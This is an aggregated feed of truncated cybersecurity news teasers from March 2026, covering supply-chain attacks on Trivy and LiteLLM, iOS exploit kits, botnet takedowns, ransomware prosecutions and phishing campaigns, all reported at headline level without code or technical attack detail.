Development houses: It's time to check your networks for infections. A new hacking group has been rampaging the Internet in a persistent campaign that spreads a self-propagati
Published: 2026-03-24T12:38:09
Admins: Sorry to say, but it's likely a rotate-your-secrets kind of weekend. Hackers have compromised virtually all versions of Aqua Security’s widely used Trivy vulnerability
Published: 2026-03-20T20:50:46
One Microsoft product was approved despite years of concerns about its security. In late 2024, the federal government’s cybersecurity evaluators rendered a troubling verdict o
Published: 2026-03-18T17:36:40
Internet-exposed devices that give BIOS-level access? What could possibly go wrong? Researchers are warning about the risks posed by a low-cost device that can give insiders a
Published: 2026-03-17T17:07:12
Most of the devices are made by Asus and are located in the US. Researchers say they have uncovered a takedown-resistant botnet of 14,000 routers and other network devices pri
Published: 2026-03-11T21:27:16
Python interface for LLMs infected with malware via polluted CI/CD pipeline Two versions of LiteLLM, an open source interface for accessing multiple large language models, have been removed from the Python Package Index (PyPI) following a supply chai
Published: 2026-03-24T19:11:01
If you've been putting off an update to iOS 26, now might be the time to do it. On Wednesday, security researchers published findings on a new hacking tool that targets iPhones running iOS 18.4 to 18.6.2, as reported earlier by Wired. The "DarkSword" exploit allows bad actors to scoop up the personal information on […] 
If you've been putting off an update to iOS 26, now might be the time to do it. On Wednesday, security researchers published findings on a new hacking tool that targets iPhones running iOS 18.4 to 18.6.2, as reported earlier by Wired. The "DarkSwor...
Published: 2026-03-18T12:45:45
US medical equipment provider Stryker said its global networks were disrupted by a cyberattack on Wednesday, allegedly carried out by a hacking group linked to Iran. The attack impacted Stryker's internal Microsoft environment and deleted information from devices, with one employee telling NBC News that company phones stopped working, grinding work and communications to a […] 
US medical equipment provider Stryker said its global networks were disrupted by a cyberattack on Wednesday, allegedly carried out by a hacking group linked to Iran. The attack impacted Stryker's internal Microsoft environment and deleted informati...
Published: 2026-03-12T07:28:53
Meta is adding more scam detection tools to Facebook, Messenger, and WhatsApp that can help users protect their accounts. In its announcement, Meta says the new features aim to alert users about suspicious activities before they engage with them, such as unrecognized friend requests and device linking notifications, because "we know that scammers try to […] 
Meta is adding more scam detection tools to Facebook, Messenger, and WhatsApp that can help users protect their accounts. In its announcement, Meta says the new features aim to alert users about suspicious activities before they engage with them, s...
Published: 2026-03-11T07:00:00
A new info-stealing malware called Torg Grabber is stealing sensitive data from 850 browser extensions, more than 700 of them for cryptocurrency wallets. [...]
Published: 2026-03-25T14:32:37
Citrix has patched two NetScaler ADC and NetScaler Gateway vulnerabilities, one of which is very similar to the CitrixBleed and CitrixBleed2 flaws exploited in zero-day attacks in recent years. [...]
Published: 2026-03-25T11:52:10
TP-Link has patched several vulnerabilities in its Archer NX router series, including a critical-severity flaw that may allow attackers to bypass authentication and upload new firmware. [...]
Published: 2026-03-25T07:11:00
A Russian national has been sentenced to two years in prison after admitting that the phishing botnet he managed was used to launch BitPaymer ransomware attacks against 72 U.S. companies. [...]
Published: 2026-03-25T04:47:29
The TeamPCP hacking group continues its supply-chain rampage, now compromising the massively popular "LiteLLM" Python package on PyPI and claiming to have stolen data from hundreds of thousands of devices during the attack. [...]
Published: 2026-03-24T18:29:01
The Federal Communications Commission has updated its Covered List to include all consumer routers made in foreign countries, banning the sale of new models in the U.S. [...]
Published: 2026-03-24T16:41:30
Bug bounty platform HackerOne is notifying hundreds of employees that their data was stolen after attackers hacked Navia, one of its U.S. benefits administrators. [...]
Published: 2026-03-24T10:01:02
Infinite Campus, a widely used K-12 student information system, is warning customers of a data breach following an extortion attempt by a threat actor. [...]
Published: 2026-03-24T09:48:38
A Russian national was sentenced to nearly 7 years in prison after pleading guilty to acting as an initial access broker (IAB) for Yanluowang ransomware attacks. [...]
Published: 2026-03-24T09:06:03
Introduction Google Threat Intelligence Group (GTIG) has identified a new iOS full-chain exploit that leveraged multiple zero-day vulnerabilities to fully compromise devices. Based on toolmarks in recovered payloads, we believe the exploit chain to
Published: 2026-03-18T14:00:00
Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark Introduction Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ran
Published: 2026-03-16T14:00:00
The post Federal Cyber Experts Thought Microsoft’s Cloud Was “a Pile of Shit.” They Approved It Anyway. appeared first on ProPublica. In late 2024, the federal government’s cybersecurity evaluators rendered a troubling verdict on one of Microsoft’s
Published: 2026-03-18T10:00:00
The post This DHS Official Oversees the Security of Federal Elections. He Wants to Ban Voting Machines. appeared first on ProPublica. In his top post at the Department of Homeland Security, David Harvilicz sets policy on protecting the nation’s ele
Published: 2026-03-14T18:00:00
The U.S. Justice Department joined authorities in Canada and Germany in dismantling the online infrastructure behind four highly disruptive botnets that compromised more than three million Internet of Things (IoT) devices, such as routers and web cam... 
Published: 2026-03-20T00:49:19
A hacktivist group with links to Iran’s intelligence agencies is claiming responsibility for a data-wiping attack against Stryker, a global medical technology company based in Michigan. News reports out of Ireland, Stryker’s largest hub o... 
Published: 2026-03-11T16:20:13
Microsoft Corp. today pushed security updates to fix at least 77 vulnerabilities in its Windows operating systems and other software. There are no pressing “zero-day” flaws this month (compared to February’s five zero-day treat), bu... 
Published: 2026-03-11T00:32:51
Four former NSA bosses walk onto the stage at RSAC rsac 2026 There's a theoretical red line with cyber warfare. Cross it, and the US will respond with a physical attack like missile strikes. And that line "is whatever the President says it is," according to former NSA boss retired General Paul Nakasone.
Published: 2026-03-25T18:55:14
Omnissa telemetry suggests business buyers are loving Apple and Google End-user compute vendor Omnissa, the company formed by the spin-out of VMware's virtual desktops, applications, and device management biz, has dug into the telemetry it collects from customers and painted a picture of the world's enterprise hardware fleet and the news is better for Google and Apple than it is for Microsoft.
Published: 2026-03-25T07:29:12
Cyber rights org retools for the days of AI and unrestrained government interview The Electronic Frontier Foundation (EFF) on Tuesday appointed Nicole Ozer to succeed Cindy Cohn as the cyber rights group's executive director when Cohn departs this summer.
Published: 2026-03-24T21:00:08
Crims 'creating a snowball effect' across open source projects RSAC 2026 Thousands of organizations' cloud environments have been infected with secret-stealing malware as a result of the Trivy supply-chain attack last week, and now the crims that compromised the open source scanners are working with notorious extortion crews like Lapsus$.
Published: 2026-03-24T20:31:09
Python interface for LLMs infected with malware via polluted CI/CD pipeline Two versions of LiteLLM, an open source interface for accessing multiple large language models, have been removed from the Python Package Index (PyPI) following a supply chain attack that injected them with malicious credential-stealing code.
Published: 2026-03-24T19:11:01
Nearly 300 employees caught up in intrusion at benefits provider Navia Almost 300 HackerOne employees are caught up in a data breach, with the bug bounty biz slamming a third-party benefits provider for a weeks-long delay in notification.
Published: 2026-03-24T13:27:07
Unfortunately, there aren't many options unless you're Starlink Citing national security fears, America is effectively banning any new consumer-grade network routers made abroad.
Published: 2026-03-24T12:19:36
Aleksei Volkov sentenced after enabling attacks that cost victims millions A Russian national who sold the keys to corporate networks faces nearly seven years in a US prison after prosecutors tied his handiwork to a string of ransomware attacks costing victims millions of dollars.
Published: 2026-03-24T11:32:11
'It freakin' worked' says Rob Joyce - and shows how relentless AI agents can find holes humans miss RSAC 2026 The now-infamous Anthropic report about Chinese cyberspies abusing Claude AI to automate cyberattacks was a Rorschach test for the infosec community, according to former NSA cyber boss Rob Joyce.
Published: 2026-03-23T22:50:21
Here's where you ought to spend your security billable hours budget this year Strengthen your MFA policies, double-down on anti-phishing training, and for Jobs' sake, patch all your vulns right away. The past year of intelligence collected by Cisco's Talos threat hunters suggests that attackers are moving faster to exploit vulns, and fooling more staff than ever into giving up their credentials.
Published: 2026-03-23T20:42:11
Claims it can analyze millions of daily events with 98 percent accuracy RSAC 2026 Google's Gemini AI agents are crawling the dark web, sifting through upward of 10 million posts a day to find a handful of threats relevant to a particular organization.
Published: 2026-03-23T15:05:09
Voice phishing is second most common initial access method across all IR probes, and top in cloud break-ins RSAC 2026 Voice phishing surged last year to become the second most common method used by cybercriminals to gain initial access to their victims' IT estate and the No. 1 tactic used when breaking into cloud environments.
Published: 2026-03-23T15:00:10
Trio-Tech International initially said hack wasn't 'material,' but then stolen data was published Trio-Tech International initially shrugged off a ransomware attack at a Singapore subsidiary as immaterial, only to reverse course days later after discovering stolen data had been disclosed.
Published: 2026-03-23T12:33:15
Infosec pros descend on San Francisco kettle When El Reg cybersecurity editor Jessica Lyons joins infosec industry colleagues in San Francisco for RSAC 2026 this week, she's expecting agentic AI to be on everyone's lips - at least those who aren't busy gossiping about the lack of presence from any representatives of the US federal government.
Published: 2026-03-23T12:24:50
The era of reliability begins... right after this out-of-band patch Microsoft has released an out-of-band update to resolve bugs introduced by a Windows patch just days after promising improved reliability.
Published: 2026-03-23T11:24:37
Ukraine's battlefield lessons show quantity and affordability now trump exquisite hardware NATO is unprepared to deal with attacks by cheap, mass-produced drones and urgently needs layered, affordable air defense systems to counter the threat, taking a cue from the experience gained by Ukrainian forces over the past four years.
Published: 2026-03-23T10:14:12
PLUS: US takes down Iranian propaganda sites; Marketing company asks 'Why Do We Have Your Information?' And more! Infosec In Brief Russian intelligence-affiliated parties are posing as customer support services on commercial messaging applications such as Signal to compromise accounts and conduct phishing attacks, the FBI and Cybersecurity and Infrastructure Security Agency (CISA) warned last Friday.
Published: 2026-03-22T22:12:06
Rust security maintainers contend Nadim Kobeissi's vulnerability claims are too much Updated Since February, cryptographer Nadim Kobeissi has been trying to get code fixes applied to Rust cryptography libraries to address what he says are critical bugs. For his efforts, he's been dismissed, ignored, and banned from Rust security channels.
Published: 2026-03-20T21:07:17
Cams statistically more likely to ID Black people, says new research A UK police force has suspended its deployment of live facial recognition (LFR) technology after a study revealed it was statistically more likely to identify Black people on a watchlist database.
Published: 2026-03-20T13:35:25
Millions of hijacked devices powered traffic floods targeting defense systems and beyond The US government has moved to disrupt a cluster of IoT botnets behind some of the largest DDoS attacks ever recorded, including traffic bursts topping 30 terabits per second.
Published: 2026-03-20T13:07:26
Lack of clear criteria risks encouraging firms to lean on state support instead of worrying about insurance The UK's cyber watchdog has warned that the government's 1.5 billion bailout of Jaguar Land Rover (JLR) risks setting a troubling precedent for how Britain handles major cyber crises.
Published: 2026-03-20T12:42:10
Audit trails aplenty, but no price tag and no clue how long your data sticks around Opinion Last week's UK government consultation on its plans for digital identity had quite a few things missing. It did not include a price estimate - something it said was due to decisions yet to be taken on the scheme's scope - or how long the government would keep "audit trail" records of ID checks.
Published: 2026-03-20T10:15:14
He would have gotten away with it too, if it weren't for a meddling security team's fear of USB On Call Each Friday The Register offers a fresh installment of On Call, the reader-contributed column that celebrates the fine art of tech support.
Published: 2026-03-20T07:30:11
Last time: Beijing-backed snoops and ransomware crims. Who's next? Unknown baddies are abusing yet another critical Microsoft SharePoint bug to compromise victims' SharePoint servers, the US government warned.
Published: 2026-03-19T18:54:19
Chocolate Factory describes concession as an attempt to balance openess with safety It turns out you won't be limited to Google-verified apps and developers on Android after all. In the face of sustained community dissatisfaction with its developer verification requirement, Google has given Android users an out.
Published: 2026-03-19T18:30:06
Iran-linked attackers wiped employees' devices using Intune The US government has urged companies to better secure Microsoft Intune, an endpoint management tool that was abused in last week's cyberattack against med-tech firm Stryker.
Published: 2026-03-19T16:00:20
Where are you? What are you working on? Why are you doing that? Identity access and management platform Okta announced the general availability of its Okta for AI Agents, which will give customers the ability to do three things: locate agents, see what they re doing, and shut them down if need be.
Published: 2026-03-18T23:05:31
Darksword is the second iOS exploit chain in a month A new exploit kit targeting iPhone users and stealing their sensitive data is being abused by "multiple" spyware vendors and suspected nation-state goons, security researchers said on Wednesday.
Published: 2026-03-18T21:39:04
Interlock's post-exploit toolkit exposed Ransomware criminals exploited CVE-2026-20131, a maximum-severity bug in Cisco Secure Firewall Management Center software, as a zero-day vulnerability more than a month before Cisco patched the hole, according to Amazon security boss CJ Moses.
Published: 2026-03-18T17:40:31
Researchers map full org chart of the scam from dodgy recruiters to helpful Western collaborators Researchers at IBM X Force and Flare Research have uncovered data that sheds light on how North Korea's fake IT worker schemes operate and infiltrate companies in order to funnel money back to the regime and steal sensitive information.
Published: 2026-03-18T13:57:07
No 1 Space Operations Squadron will get a persistent stare capability The Ministry of Defence (MoD) plans to spend 17.5 million on a remotely-operated satellite monitoring facility in Cyprus, partly to protect the UK's secure communications system Skynet.
Published: 2026-03-18T12:34:15
Even without a navy, or air power, 'They'll still have the ability to hack' Businesses should expect that Iran will conduct more aggressive cyber-ops as the war escalates, according to security analysts.
Published: 2026-03-18T07:32:08
Big Tech donates $12.5 million to get things rolling Half a dozen Big Tech players have together delivered $12.5 million in grants towards a project that aims to help maintainers of open source projects to cope with AI slop bug reports.
Published: 2026-03-18T04:05:45
In less polite places, this is called hacking back or offensive cyber-ops Japan's government yesterday decided to allow its Self-Defense Force to conduct offensive cyber-operations, starting on October 1st.
Published: 2026-03-18T02:49:49
Sell your soul to the orb Sam Altman has cooked up a plan to make his cryptocurrency/identity/eyeball-scanning-orb venture more useful by you guessed it adding agentic AI to the mix. Now the technology behind it will be used to identify the human behind bots.
Published: 2026-03-17T20:26:08
State-sponsored attackers joined by Chinese snoops and hackers-for-hire in latest round of economic penalties The Council of the European Union sanctioned Emennet Pasargad on Monday, a company used as a front for a series of Iranian cyberattacks.
Published: 2026-03-17T16:18:38
Midmarket security leaders aren't as secure as they think, says Intruder's report Partner Content The midmarket matters. JP Morgan estimates approximately 300,000 organizations generating $13T in annual revenue. Yet they occupy an awkward position in the security landscape. They're large enough to be attractive targets with complex digital estates, significant revenue, and valuable data, but not large enough to have the headcount, budget maturity, or tooling sophistication of an enterprise security team.
Published: 2026-03-17T09:00:16
SCION: Proven in banking and healthcare, slow to spread everywhere else Feature BGP, the Border Gateway Protocol, was not designed to be secure. It was designed to work to route packets between the thousands of autonomous systems that make up the internet, quickly and at scale.
Published: 2026-03-17T08:15:07
Admins may be even more exhausted by then, because securing Microsoft's AI helper is not a trivial job Gartner analyst Dennis Xu has half-jokingly suggested banning use of Microsoft's Copilot AI on Friday afternoons, because he fears at that time of week users may be too lazy to properly check its possibly offensive output.
Published: 2026-03-17T04:37:40
AI helped send weekly threat signal count from 80 million to 400 billion, then helped response time shrink from two days to 30 minutes Australia's Commonwealth Bank built its own agentic AI threat hunting tools, because vendors are too slow to develop tools that can cope with emerging AI-powered threats, according to General Manager of Cyber Defence Operations Andrew Pade.
Published: 2026-03-17T02:37:16
Operations and hospital networks not affected, we're told Robotics-assisted surgical tech firm Intuitive said that unauthorized intruders gained access to some of its internal IT business applications after stealing an employee's credentials during a phishing attack.
Published: 2026-03-16T20:04:08
Hacktivists use proxy services from Russia, China for 'billions of designed-for-abuse connection attempts' Cybercrime has skyrocketed since the start of the Iran war, according to Akamai, which reports a 245 percent increase in everything from credential harvesting attempts to automated reconnaissance traffic aimed at banks and other critical businesses.
Published: 2026-03-16T18:40:30
Interpol says fraud schemes using the tech are 4.5x more profitable AI is apparently good for the bottom line if your business is crime. Financial fraud schemes carried out with the help of artificial intelligence are 4.5 times more profitable than those that aren't enhanced, according to Interpol's latest estimates.
Published: 2026-03-16T16:40:06
Back button blunder in WebFiling service run by Companies House revealed confidential paperwork Companies House was forced to pull down its record-filing platform for the entire weekend to rectify a "security issue" that exposed the personal details of company directors and other data to any logged in users.
Published: 2026-03-16T12:18:23
PLUS: Citrix CISO urges patch blitz; Mandiant founder reveals AI red-teaming tech; Bitter privacy news for Starbucks; And more Infosec In Brief Canadian outsourcer Telus Digital has admitted it fell victim to a cyberattack.
Published: 2026-03-15T23:24:51
And then they send victims to the legit VPN download to hide their tracks A group of cybercriminals tracked as Storm-2561 is using fake enterprise VPN clients from CheckPoint, Cisco, Fortinet, Ivanti, and other vendors to steal users' credentials, according to Microsoft.
Published: 2026-03-13T17:17:19
Operation Synergia's third season is the most productive to date Ninety-four people were arrested as part of a global, multi-month cybercrime crackdown, Interpol revealed today.
Published: 2026-03-13T12:39:54
Take your YOLO and box it up exclusive NanoClaw, an open source agent platform, can now run inside Docker Sandboxes, furthering the project's commitment to security.
Published: 2026-03-13T11:50:11
Skia graphics lib and V8 JavaScript engine brings browser's tally of actively exploited bugs to three in 2026 Google has pushed out an emergency Chrome update to fix two previously unknown vulnerabilities that attackers were already exploiting before the patches landed.
Published: 2026-03-13T11:25:14
Prompt like a hard-ass boss who won't tolerate failure and bots will find ways to breach policy AI agents work together to bypass security controls and stealthily steal sensitive data from within the enterprise systems in which they operate, according to tests carried out by frontier security lab Irregular.
Published: 2026-03-12T23:49:32
As war reshapes the Gulf, the satellite infrastructure the world relies on to see conflict clearly is being delayed, spoofed, and privately controlled and nobody is sure who is responsible.
Published: 2026-03-25T13:00:42
The crowdsourced website and app Mahsa Alert provides citizens in Iran with crucial information amid the country’s ongoing war with the US and Israel and an internet blackout.
Published: 2026-03-25T09:00:00
Attachment to smart devices and biometric surveillance leaves Americans more vulnerable to police searches than ever. Left unchecked it will only get worse.
Published: 2026-03-24T10:00:00
A family in Chicago has been terrified to leave their apartment. Agents could be anywhere.
Published: 2026-03-24T10:00:00
Under a Homeland Security program, police departments around the US are signing up to assist in immigration enforcement. The cops of Carroll, New Hampshire, are going all in and they’re likely not alone.
Published: 2026-03-24T09:00:00
First heard as US and Israeli strikes on Iran began, the shortwave broadcast has since been traced to a US military base in Germany but its purpose and its operator remain unclear.
Published: 2026-03-23T18:59:17
In a place denied access to basic forensic technology and where people disappear into Israeli detention the fate of thousands remains unknown. One of them is an autistic teenager.
Published: 2026-03-23T10:00:00
For families of the missing, systemic obstacles to identifying remains and locating people in Israeli detention has created a kind of social and legal purgatory.
Published: 2026-03-23T10:00:00
Plus: The FBI admits it’s buying phone data to track Americans, Iranian hackers disrupt medical care at Maryland hospitals, and more.
Published: 2026-03-21T10:30:00
Congressman Jim Himes claims a sweeping surveillance authority should stay intact because he hasn't seen abuses by Kash Patel's FBI, according to internal messaging obtained by WIRED.
Published: 2026-03-20T20:46:45
Meta blamed users for not opting into the privacy-protecting feature. Experts fear the move could be the first major domino to fall for end-to-end encryption tech worldwide.
Published: 2026-03-20T10:00:00
The Aisuru, Kimwolf, JackSkid, and Mossad botnets had infected more than 3 million devices in total, many inside home networks, according to the US Justice Department.
Published: 2026-03-20T00:07:30
Moxie Marlinspike says the technology powering his encrypted AI chatbot, Confer, will be integrated into Meta AI. The move could help protect the AI conversations of millions of people.
Published: 2026-03-19T14:09:51
A powerful iPhone-hacking technique known as DarkSword has been discovered in use by Russian hackers. It can take over devices running iOS 18 that simply visit infected websites.
Published: 2026-03-18T14:00:00
On March 26, a panel of WIRED experts will dissect the defense tech industry’s impact on modern warfare. Submit your questions now.
Published: 2026-03-18T10:30:00
Customer conversations with chatbots can include contact information and personal details that make it easier for scammers to launch phishing attacks and commit fraud.
Published: 2026-03-17T10:00:00
Dozens of Telegram channels reviewed by WIRED include job listings for “AI face models.” The (mostly) women who land these gigs are likely being used to dupe victims out of their money.
Published: 2026-03-16T09:00:00
Plus: A porn-quitting app exposed the masturbation habits of hundreds of thousands of users, Russian hackers are trying to take over people’s Signal accounts, and more.
Published: 2026-03-14T10:30:00
A bipartisan bill would force the FBI to get a warrant to read Americans’ messages and ban the federal purchase of commercial data on US residents ahead of a critical April deadline.
Published: 2026-03-12T18:00:00
Amid a paralyzing breach of medical tech firm Stryker, the group has come to represent Iran's use of “hacktivism” as cover for chaotic, retaliatory state-sponsored cyberattacks.
Published: 2026-03-12T16:14:39
The alleged administrator of the LeakBase cybercrime forum has been arrested by Russian law enforcement authorities, state media reported Thursday. According to TASS and MVD Media, a news website linked to the Russian Interior Ministry, the suspect is a resident of the city of Taganrog. The suspect is said to have been detained for creating and managing a criminal site that allowed stolen
Published: 2026-03-25T23:05:00
Cybersecurity researchers have flagged a new evolution of the GlassWorm campaign that delivers a multi-stage framework capable of comprehensive data theft and installing a remote access trojan (RAT), which deploys an information-stealing Google Chrome extension masquerading as an offline version of Google Docs. "It logs keystrokes, dumps cookies and session tokens, captures screenshots, and
Published: 2026-03-25T19:56:00
In September 2025, Anthropic disclosed that a state-sponsored threat actor used an AI coding agent to execute an autonomous cyber espionage campaign against 30 global targets. The AI handled 80-90% of tactical operations on its own, performing reconnaissance, writing exploit code, and attempting lateral movement at machine speed. This incident is worrying, but there's a scenario that should
Published: 2026-03-25T17:28:00
The U.S. Department of Justice (DoJ) said a Russian national has been sentenced to two years in prison for managing a botnet that was used to launch ransomware attacks against U.S. companies. Ilya Angelov, 40, of Tolyatti, Russia, was also fined $100,000. Angelov, who went by the online aliases "milan" and "okart," is said to have co-managed a Russia-based cybercriminal group known as TA551 (aka
Published: 2026-03-25T17:22:00
Cybersecurity researchers are calling attention to an active device code phishing campaign that's targeting Microsoft 365 identities across more than 340 organizations in the U.S., Canada, Australia, New Zealand, and Germany. The activity, per Huntress, was first spotted on February 19, 2026, with subsequent cases appearing at an accelerated pace since then. Notably, the campaign leverages
Published: 2026-03-25T17:04:00
The U.S. Federal Communications Commission (FCC) said on Monday that it was banning the import of new, foreign-made consumer routers, citing "unacceptable" risks to cyber and national security. The action was designed to safeguard Americans and the underlying communications networks the country relies on, FCC Chairman Brendan Carr said in a post on X. The development means that new models of
Published: 2026-03-25T12:41:00
TeamPCP, the threat actor behind the recent compromises of Trivy and KICS, has now compromised a popular Python package named litellm, pushing two malicious versions containing a credential harvester, a Kubernetes lateral movement toolkit, and a persistent backdoor. Multiple security vendors, including Endor Labs and JFrog, revealed that litellm versions 1.82.7 and 1.82.8 were published on March
Published: 2026-03-24T23:51:00
A large-scale malvertising campaign active since January 2026 has been observed targeting U.S.-based individuals searching for tax-related documents to serve rogue installers for ConnectWise ScreenConnect that drop a tool named HwAudKiller to blind security programs using the bring your own vulnerable driver (BYOVD) technique. "The campaign abuses Google Ads to serve rogue ScreenConnect (
Published: 2026-03-24T22:35:00
On February 25, 2026, Gartner published its inaugural Market Guide for Guardian Agents, marking an important milestone for this emerging category. For those unfamiliar with the various Gartner report types, “a Market Guide defines a market and explains what clients can expect it to do in the short term. With the focus on early, more chaotic markets, a Market Guide does not rate or position
Published: 2026-03-24T22:06:05
An ongoing phishing campaign is targeting French-speaking corporate environments with fake resumes that lead to the deployment of cryptocurrency miners and information stealers. "The campaign uses highly obfuscated VBScript files disguised as resume/CV documents, delivered through phishing emails," Securonix researchers Shikha Sangwan, Akshay Gaikwad, and Aaron Beardslee said in a report shared
Published: 2026-03-24T22:05:00
Cybersecurity has changed fast. Roles are more specialized, and tooling is more advanced. On paper, this should make organizations more secure. But in practice, many teams struggle with the same basic problems they faced years ago: unclear risk priorities, misaligned tooling decisions, and difficulty explaining security issues in terms the business understands. These challenges do not
Published: 2026-03-24T17:31:00
Cybersecurity researchers have uncovered a new set of malicious npm packages that are designed to steal cryptocurrency wallets and sensitive data. The activity is being tracked by ReversingLabs as the Ghost campaign. The list of identified packages, all published by a user named mikilanjillo, is below - react-performance-suite react-state-optimizer-core react-fast-utilsa ai-fast-auto-trader
Published: 2026-03-24T17:30:00
Two more GitHub Actions workflows have become the latest to be compromised by credential-stealing malware by a threat actor known as TeamPCP, the cloud-native cybercriminal operation also behind the Trivy supply chain attack. The workflows, both maintained by the supply chain security company Checkmarx, are listed below - checkmarx/ast-github-action checkmarx/kics-github-action Cloud security
Published: 2026-03-24T16:08:00
A 26-year-old Russian citizen has been sentenced in the U.S. to 6.75 years (81 months) in prison for his role in assisting major cybercrime groups, including the Yanluowang ransomware crew, in conducting numerous attacks against U.S. companies and other organizations. According to the U.S. Department of Justice (DoJ), Aleksei Olegovich Volkov facilitated dozens of ransomware attacks across the
Published: 2026-03-24T12:19:00
Citrix has released security updates to address two vulnerabilities in NetScaler ADC and NetScaler Gateway, including a critical flaw that could be exploited to leak sensitive data from the application. The vulnerabilities are listed below - CVE-2026-3055 (CVSS score: 9.3) - Insufficient input validation leading to memory overread CVE-2026-4368 (CVSS score: 7.7) - Race condition leading to user
Published: 2026-03-24T11:29:00
The North Korean threat actors behind the Contagious Interview campaign, also tracked as WaterPlum, have been attributed to a malware family tracked as StoatWaffle that's distributed via malicious Microsoft Visual Studio Code (VS Code) projects. The use of VS Code "tasks.json" to distribute malware is a relatively new tactic adopted by the threat actor since December 2025, with the attacks
Published: 2026-03-23T23:39:00
Another week, another reminder that the internet is still a mess. Systems people thought were secure are being broken in simple ways, showing many still ignore basic advisories. This edition covers a mix of issues: supply chain attacks hitting CI/CD setups, long-abused IoT devices being shut down, and exploits moving quickly from disclosure to real attacks. There are also new malware tricks
Published: 2026-03-23T18:44:00
AWS Bedrock is Amazon's platform for building AI-powered applications. It gives developers access to foundation models and the tools to connect those models directly to enterprise data and systems. That connectivity is what makes it powerful but it’s also what makes Bedrock a target. When an AI agent can query your Salesforce instance, trigger a Lambda function, or pull from a SharePoint
Published: 2026-03-23T17:25:00
Microsoft has warned of fresh campaigns that are capitalizing on the upcoming tax season in the U.S. to harvest credentials and deliver malware. The email campaigns take advantage of the urgency and time-sensitive nature of emails to send phishing messages masquerading as refund notices, payroll forms, filing reminders, and requests from tax professionals to deceive recipients into opening
Published: 2026-03-23T16:25:00
Cybersecurity researchers have uncovered malicious artifacts distributed via Docker Hub following the Trivy supply chain attack, highlighting the widening blast radius across developer environments. The last known clean release of Trivy on Docker Hub is 0.69.3. The malicious versions 0.69.4, 0.69.5, and 0.69.6 have since been removed from the container image library. "New image tags 0.69.5 and
Published: 2026-03-23T14:01:00
Threat actors are suspected to be exploiting a maximum-severity security flaw impacting Quest KACE Systems Management Appliance (SMA), according to Arctic Wolf. The cybersecurity company said it observed malicious activity starting the week of March 9, 2026, in customer environments that's consistent with the exploitation of CVE-2025-32975 on unpatched SMA systems exposed to the internet. It's
Published: 2026-03-23T11:45:00
Threat actors affiliated with Russian Intelligence Services are conducting phishing campaigns to compromise commercial messaging applications (CMAs) like WhatsApp and Signal to seize control of accounts belonging to individuals with high intelligence value, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) said Friday. "The campaign
Published: 2026-03-21T18:47:00
Oracle has released security updates to address a critical security flaw impacting Identity Manager and Web Services Manager that could be exploited to achieve remote code execution. The vulnerability, tracked as CVE-2026-21992, carries a CVSS score of 9.8 out of a maximum of 10.0. "This vulnerability is remotely exploitable without authentication," Oracle said in an advisory. "If successfully
Published: 2026-03-21T15:54:00
The threat actors behind the supply chain attack targeting the popular Trivy scanner are suspected to be conducting follow-on attacks that have led to the compromise of a large number of npm packages with a previously undocumented self-propagating worm dubbed CanisterWorm. The name is a reference to the fact that the malware uses an ICP canister, which denotes a tamperproof smart contract on
Published: 2026-03-21T13:55:00
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added five security flaws impacting Apple, Craft CMS, and Laravel Livewire to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to patch them by April 3, 2026. The vulnerabilities that have come under exploitation are listed below - CVE-2025-31277 (CVSS score: 8.8) - A vulnerability in Apple
Published: 2026-03-21T13:55:00
Trivy, a popular open-source vulnerability scanner maintained by Aqua Security, was compromised a second time within the span of a month to deliver malware capable of stealing sensitive CI/CD secrets. The latest incident impacted GitHub Actions "aquasecurity/trivy-action" and "aquasecurity/setup-trivy," which are used to scan Docker container images for vulnerabilities and set up GitHub Actions
Published: 2026-03-20T23:17:00
A critical security flaw impacting Langflow has come under active exploitation within 20 hours of public disclosure, highlighting the speed at which threat actors weaponize newly published vulnerabilities. The security defect, tracked as CVE-2026-33017 (CVSS score: 9.3), is a case of missing authentication combined with code injection that could result in remote code execution. "The POST /api/v1
Published: 2026-03-20T20:45:00
Google on Thursday announced a new "advanced flow" for Android sideloading that requires a mandatory 24-hour wait period to install apps from unverified developers in an attempt to balance openness with safety. The new changes come against the backdrop of a developer verification mandate the tech giant announced last year that requires all Android apps to be registered by verified developers to
Published: 2026-03-20T16:27:00
Artificial Intelligence (AI) is changing how individuals and organizations conduct many activities, including how cybercriminals carry out phishing attacks and iterate on malware. Now, cybercriminals are using AI to generate personalized phishing emails, deepfakes and malware that evade traditional detection by impersonating normal user activity and bypassing legacy security models. As a result,
Published: 2026-03-20T15:30:00
Sansec is warning of a critical security flaw in Magento's REST API that could allow unauthenticated attackers to upload arbitrary executables and achieve code execution and account takeover. The vulnerability has been codenamed PolyShell by Sansec owing to the fact that the attack hinges on disguising malicious code as an image. There is no evidence that the shortcoming has been exploited in
Published: 2026-03-20T15:00:00
The U.S. Department of Justice (DoJ) on Thursday announced the disruption of command-and-control (C2) infrastructure used by several Internet of Things (IoT) botnets like AISURU, Kimwolf, JackSkid, and Mossad as part of a court-authorized law enforcement operation. The effort also saw authorities from Canada and Germany targeting the operators behind these botnets, with a number of private
Published: 2026-03-20T11:55:00
Apple is urging users who are still running an outdated version of iOS to update their iPhones to secure against web-based attacks carried out via powerful exploit kits like Coruna and DarkSword. These attacks employ malicious web content to target out-of-date versions of iOS, triggering an infection chain that leads to the theft of sensitive data. "For example, if you're using an older
Published: 2026-03-20T10:46:00
Cybersecurity researchers have flagged a new malware dubbed Speagle that hijacks the functionality and infrastructure of a legitimate program called Cobra DocGuard. "Speagle is designed to surreptitiously harvest sensitive information from infected computers and transmit it to a Cobra DocGuard server that has been compromised by the attackers, masking the data exfiltration process as legitimate
Published: 2026-03-20T00:46:00
A new analysis of endpoint detection and response (EDR) killers has revealed that 54 of them leverage a technique known as bring your own vulnerable driver (BYOVD) by abusing a total of 35 vulnerable drivers. EDR killer programs have been a common presence in ransomware intrusions as they offer a way for affiliates to neutralize security software before deploying file-encrypting malware. This
Published: 2026-03-20T00:22:00
ThreatsDay Bulletin is back on The Hacker News, and this week feels off in a familiar way. Nothing loud, nothing breaking everything at once. Just a lot of small things that shouldn’t work anymore but still do. Some of it looks simple, almost sloppy, until you see how well it lands. Other bits feel a little too practical, like they’re already closer to real-world use than anyone
Published: 2026-03-19T19:55:00
